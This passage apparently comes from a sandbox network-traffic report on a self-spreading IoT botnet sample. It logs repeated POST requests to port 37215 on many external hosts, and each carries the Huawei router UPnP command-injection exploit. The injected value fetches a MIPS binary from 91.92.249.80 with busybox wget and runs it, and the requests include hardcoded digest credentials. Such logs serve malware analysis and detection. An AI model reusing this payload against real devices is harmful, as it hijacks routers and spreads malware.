                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2158192.168.2.2337616157.62.40.9437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.629080057 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2159192.168.2.2356892197.23.211.7937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.629276991 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2160192.168.2.2353700157.113.81.3937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.629324913 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2161192.168.2.2340492157.244.234.12637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.629336119 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2162192.168.2.2359908163.251.145.2437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.630028963 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2163192.168.2.2335520197.238.109.8937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.630033970 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2164192.168.2.233442274.80.193.20137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.630044937 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2165192.168.2.234061041.79.207.16737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.630520105 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2166192.168.2.233302451.53.144.15437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.630563021 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2167192.168.2.2342938157.192.106.6937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.630727053 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2168192.168.2.2346018128.124.83.3537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.630776882 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
